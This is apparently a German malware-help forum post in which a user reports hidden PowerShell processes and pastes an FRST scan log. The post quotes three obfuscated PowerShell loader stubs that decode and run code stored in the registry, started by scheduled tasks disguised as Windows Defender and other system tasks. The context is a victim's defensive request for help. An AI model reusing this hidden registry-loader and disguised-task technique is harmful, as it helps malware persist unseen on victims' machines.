| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: drei Unbekannte Powershell ProzesseWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
24.10.2023, 12:56
| #1 |
| |  drei Unbekannte Powershell Prozesse Hallo Liebe Helfende, mir ist vor ein paar Tagen aufgefallen, dass in unregelmäßigen Abständen drei Powershell Prozesse gestartet werden. Ich konnte über die Powershell rausfinden woher die Skripte ausgeführt werden: Code:
ATTFilter PS C:\WINDOWS\system32> $process = "powershell.exe"
PS C:\WINDOWS\system32> Get-WmiObject Win32_Process -Filter "name = '$process'" | Select-Object CommandLine
CommandLine
-----------
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1"
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1"
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Die tmp datei hat keinen Inhalt und ist auch 0 Byte groß. Die ps1 Datei besteht aus etwas kryptischem Code: Code:
ATTFilter 6765.tmp.ps1
$yIoqbjDsnZ=[ScriptBlock];$CZtALbgntZ=[string];$COZXMQtyTh=[char]; icm ($yIoqbjDsnZ::Create($CZtALbgntZ::Join('', ((gp (([regex]::Matches('h7kZQHsketlaeR\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'THk9xu3' | % { [char]$_ }))))
80B7.tmp.ps1
$MRdfEpxTJLAo=[ScriptBlock];$eoZGFIdEIT=[string];$XXdgsgbZdvW=[char]; icm ($MRdfEpxTJLAo::Create($eoZGFIdEIT::Join('', ((gp (([regex]::Matches('FRNf2QHMoredniwnU\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'ZzHqeu6' | % { [char]$_ }))))
E7CE.tmp.ps1
$jWPfTZujIRus=[ScriptBlock];$vzvLHTysVjBM=[string];$lQBXNejQaz=[char]; icm ($jWPfTZujIRus::Create($vzvLHTysVjBM::Join('', ((gp (([regex]::Matches('CCesHuNcimihaN\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'gzlbCQiYgEa' | % { [char]$_ }))))
FRST.txt Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 06-10-2023
durchgeführt von ***** (Administrator) auf DESKTOP-06IS096 (Micro-Star International Co., Ltd MS-7B86) (24-10-2023 13:12:03)
Gestartet von D:\downloads\FRST64(1).exe
Geladene Profile: *****
Plattform: Microsoft Windows 11 Pro Version 22H2 22621.2428 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
(C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cncmd.exe
(C:\Program Files\Mozilla Firefox\firefox.exe ->) (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(C:\Program Files\PowerToys\modules\Peek\PowerToys.Peek.UI.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\118.0.2088.61\msedgewebview2.exe <6>
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\AlwaysOnTop\PowerToys.AlwaysOnTop.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\Awake\PowerToys.Awake.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\ColorPicker\PowerToys.ColorPickerUI.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\FancyZones\PowerToys.FancyZones.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\KeyboardManager\KeyboardManagerEngine\PowerToys.KeyboardManagerEngine.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\launcher\PowerToys.PowerLauncher.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\Peek\PowerToys.Peek.UI.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\modules\PowerOCR\PowerToys.PowerOCR.exe
(cmd.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(DriverStore\FileRepository\u0396906.inf_amd64_85a7dd2e12f92c85\B396804\atiesrxx.exe ->) (Advanced Micro Devices Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0396906.inf_amd64_85a7dd2e12f92c85\B396804\atieclxx.exe
(explorer.exe ->) (The SABnzbd-Team) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\SABnzbd\SABnzbd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <21>
(Proton Technologies AG -> ) C:\Program Files\Proton\VPN\v3.2.4\ProtonVPN.exe
(services.exe ->) (Advanced Micro Devices Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0396906.inf_amd64_85a7dd2e12f92c85\B396804\atiesrxx.exe
(services.exe ->) (FOXIT SOFTWARE INC. -> Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
(services.exe ->) (Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe <2>
(services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exe
(services.exe ->) (Proton Technologies AG -> ProtonVPN) C:\Program Files\Proton\VPN\v3.2.4\ProtonVPN.WireGuardService.exe
(services.exe ->) (Proton Technologies AG -> ProtonVPN) C:\Program Files\Proton\VPN\v3.2.4\ProtonVPNService.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_eb52bf0d4dccfcf3\RtkAudUService64.exe
(svchost.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.exe
(svchost.exe ->) (Microsoft Windows -> ) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_423.23500.0.0_x64__cw5n1h2txyewy\Dashboard\WidgetService.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <3>
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_eb52bf0d4dccfcf3\RtkAudUService64.exe [3479488 2022-04-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\Software\Policies\...\system: [EnableActivityFeed] 0
HKLM\Software\Policies\...\system: [PublishUserActivities] 0
HKLM\Software\Policies\...\system: [UploadUserActivities] 0
HKLM\Software\Policies\...\system: [AllowCrossDeviceClipboard] 0
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [GogGalaxy] => C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe [13786600 2023-01-30] (GOG Sp. z o.o. -> GOG.com)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [EADM] => C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe [2668136 2023-05-29] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [ProtonVPN] => C:\Program Files\Proton\VPN\ProtonVPN.Launcher.exe [12277144 2023-10-17] (Proton Technologies AG -> ProtonVPN)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [MicrosoftEdgeAutoLaunch_74E0693E5CDF129AE478D3859DABC5C6] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4187176 2023-10-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (Keine Datei)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\...\Run: [MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4187176 2023-10-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SABnzbd.lnk [2023-07-21]
ShortcutTarget: SABnzbd.lnk -> C:\Program Files\SABnzbd\SABnzbd.exe (The SABnzbd-Team) [Datei ist nicht signiert] [Datei wird verwendet]
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {F3092955-A050-473F-964E-9FBA3B59F9E0} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1030584 2023-10-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {9022343B-CAE4-4C3C-92BF-A7F388DD48B2} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1030584 2023-10-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {2FC74BE2-33C9-4414-AF3D-61A57B785D43} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [183736 2023-10-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {FF1B3FD8-4B71-4A04-9447-644BF7C26C5D} - System32\Tasks\Microsoft\Windows\AppxDeploymentClient\UCPD velocity => C:\WINDOWS\system32\UCPDMgr.exe [58880 2023-09-15] (Microsoft Windows -> Microsoft Corporation)
Task: {6286BA08-0CCA-4E26-8FF0-69CFE16D411C} - System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1" <==== ACHTUNG
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Keine Datei)
Task: {7E359839-10FF-4083-92B7-07B6F17CF925} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Keine Datei)
Task: {05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
Task: {7DBFE808-E791-449D-8870-82FA39DD591C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe [1596304 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B8119B02-51EF-48D6-8F3C-FFC1551D545E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe [1596304 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4640CD2-4756-49D3-93AD-9748A1024218} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe [1596304 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {5E33D46D-6645-4E0B-9723-4CB9F0E3E6D1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe [1596304 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1" <==== ACHTUNG
Task: {31B09827-39E3-4AA5-B493-4669AFB8E011} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1" <==== ACHTUNG
Task: {C93CAC61-FA2B-4D30-9E6C-A849BAFCC6B6} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1030584 2023-10-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {1580CBF0-1674-4B28-A8FE-5B36FE6F2286} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [676768 2023-10-12] (Mozilla Corporation -> Mozilla Corporation) -> --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {AC8AFD84-1F0F-4C8A-80BB-E037B46B34A8} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [718240 2023-10-12] (Mozilla Corporation -> Mozilla Foundation)
Task: {75A55B39-510E-41F7-99F3-8A7FE754348A} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting (Keine Datei)
Task: {002C80C5-1CE2-4C73-8E35-D7B5AE35E00A} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Keine Datei)
Task: {8B80778C-15AB-4A19-AF8B-221C809D7F7E} - System32\Tasks\PowerToys\Autorun for ***** => C:\Program Files\PowerToys\PowerToys.exe [1104280 2023-05-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8F04036A-2459-40AF-B2B9-E5E19CE269E3} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [60344 2023-10-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {293420BF-2D43-4AAF-BD85-6D3D033A5555} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [324024 2023-10-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\..\Interfaces\{0f844252-968d-473a-a25a-c7d54087b676}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{80b760f6-4ea2-47fa-846d-b516c159b437}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{d294990e-4c45-4c4a-8de6-1372ad9ca703}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{eab2262d-9ab1-5975-7d92-334d06f4972b}: [NameServer] 10.2.0.1
Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\*****\AppData\Local\Microsoft\Edge\User Data\Default [2023-10-16]
Edge HomePage: Default -> hxxps://web.whatsapp.com/
Edge StartupUrls: Default -> "hxxps://web.whatsapp.com/"
Edge Extension: (Google Docs Offline) - C:\Users\*****\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-09-25]
Edge Extension: (Edge relevant text changes) - C:\Users\*****\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-25]
FireFox:
========
FF DefaultProfile: u2h8dn3a.default
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\u2h8dn3a.default [2021-10-16]
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release [2023-10-24]
FF Extension: (English United States Dictionary) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\@unitedstatesenglishdictionary.xpi [2023-10-02]
FF Extension: (German Dictionary) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\de-DE@dictionaries.addons.mozilla.org.xpi [2022-11-24]
FF Extension: (Dreamer – Balanced) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\dreamer-balanced-colorway@mozilla.org.xpi [2023-03-18]
FF Extension: (Übersetzen Sie Websites in Ihrem Browser, ohne die Cloud zu verwenden.) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\firefox-translations-addon@mozilla.org.xpi [2023-07-21]
FF Extension: (Bypass Paywalls Clean) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi [2023-10-15] [UpdateUrl:hxxps://gitlab.com/magnolia1234/bypass-paywalls-firefox-clean/-/raw/master/updates.json]
FF Extension: (uBlock Origin) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\uBlock0@raymondhill.net.xpi [2023-09-26]
FF Extension: (MetaMask) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\webextension@metamask.io.xpi [2023-10-23]
FF Extension: (Bitwarden - Kostenloser Passwortmanager) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\{446900e4-71c2-419f-a6a7-df9c091e268b}.xpi [2023-10-16]
FF Extension: (Citavi Picker) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\{8AA36F4F-6DC7-4c06-77AF-5035170634FE}.xpi [2021-11-25]
FF Extension: (Video DownloadHelper) - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2023-08-25]
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-07] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-07] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.19 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-07] (VideoLAN -> VideoLAN)
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 AntiCheatExpert Service; C:\Program Files\AntiCheatExpert\SGuard\x64\SGuardSvc64.exe [2688544 2022-07-06] (PUBG CORPORATION -> )
S3 CloudBackupRestoreSvc; C:\WINDOWS\System32\CloudRestoreLauncher.dll [1261568 2023-10-13] (Microsoft Windows -> Microsoft Corporation)
S3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11357800 2023-05-29] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-03-04] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [955816 2023-10-16] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2023-01-21] (Epic Games Inc. -> Epic Games, Inc.)
R2 FoxitReaderUpdateService; C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe [2358800 2022-05-20] (FOXIT SOFTWARE INC. -> Foxit Software Inc.)
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [2117096 2023-01-30] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [7166552 2023-01-30] (GOG Sp. z o.o. -> GOG.com)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [236864 2022-10-20] (Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert]
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11067456 2022-01-27] (Logitech Inc -> Logitech, Inc.)
S3 NahimicService; C:\WINDOWS\system32\NahimicService.exe [1888424 2021-10-08] (A-Volute SAS -> Nahimic)
R3 ProtonVPN Service; C:\Program Files\Proton\VPN\v3.2.4\ProtonVPNService.exe [472168 2023-10-17] (Proton Technologies AG -> ProtonVPN)
R3 ProtonVPN WireGuard; C:\Program Files\Proton\VPN\v3.2.4\ProtonVPN.WireGuardService.exe [471656 2023-10-17] (Proton Technologies AG -> ProtonVPN)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [402264 2023-10-13] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\Wellbia.com\ucldr_battlegrounds_gl.exe [5950504 2022-11-27] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exe [3116904 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe [133584 2023-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [10011208 2022-11-27] (PUBG CORPORATION -> KRAFTON, Inc)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 ACE-BASE; C:\Windows\system32\drivers\ACE-BASE.sys [2178912 2022-07-11] (PUBG CORPORATION -> ANTICHEATEXPERT.COM)
S3 ACE-GAME; C:\Windows\system32\drivers\ACE-GAME.sys [914760 2022-07-11] (PUBG CORPORATION -> ANTICHEATEXPERT.COM)
S3 ACR122U; C:\WINDOWS\system32\DRIVERS\acr122.sys [79840 2018-03-20] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Card Systems Ltd.)
R3 amdfendrmgr; C:\WINDOWS\System32\drivers\amdfendrmgr.sys [36736 2023-05-05] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
R3 amdgpio3; C:\WINDOWS\System32\drivers\amdgpio3.sys [36928 2022-09-16] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc)
R2 AMDRyzenMasterDriverV22; C:\WINDOWS\system32\AMDRyzenMasterDriver.sys [58952 2023-10-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices)
R3 AMDSAFD; C:\WINDOWS\System32\DriverStore\FileRepository\amdsafd.inf_amd64_54807f69fe156f14\amdsafd.sys [113088 2023-04-13] (Advanced Micro Devices Inc. -> Advanced Micro Devices)
R3 amduw23g; C:\WINDOWS\System32\DriverStore\FileRepository\u0396906.inf_amd64_85a7dd2e12f92c85\B396804\amdkmdag.sys [106396096 2023-10-19] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
R3 AMDXE; C:\WINDOWS\System32\drivers\amdxe.sys [61888 2023-05-24] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20032 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [84640 2023-03-21] (Microsoft Windows Hardware Compatibility Publisher -> wch.cn)
S3 DroidCam; C:\WINDOWS\System32\drivers\droidcam.sys [32240 2020-04-10] (Microsoft Windows Hardware Compatibility Publisher -> Dev47Apps)
S3 DroidCamVideo; C:\WINDOWS\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.sys [33784 2021-04-10] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2022-10-20] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
